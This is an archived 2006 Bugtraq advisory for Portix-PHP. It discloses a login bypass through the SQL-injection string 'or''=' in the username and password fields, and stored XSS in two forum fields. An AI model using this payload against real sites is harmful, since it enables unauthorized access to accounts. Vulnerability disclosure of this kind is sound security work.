[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Portix-PHP [login bypass & xss (post)]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Portix-PHP [login bypass & xss (post)]
From: saps.audit@xxxxxxxxx
Date: 8 Nov 2006 18:17:40 -0000

product:Portix-PHP 
vendor site :http://portix2.be
risk : medium

log with :
username: 'or''='
passwd : 'or''='

xss post on the forum , vulnerable fields  :
titre
auteur

laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@xxxxxxxxx

Prev by Date: iDefense Security Advisory 11.08.06: IBM Lotus Domino 7 tunekrnl Multiple Vulnerabilities
Next by Date: phpsatk => Remote File Include Vulnerability EXploit
Previous by thread: iDefense Security Advisory 11.08.06: IBM Lotus Domino 7 tunekrnl Multiple Vulnerabilities
Next by thread: phpsatk => Remote File Include Vulnerability EXploit
Index(es):
- Date
- Thread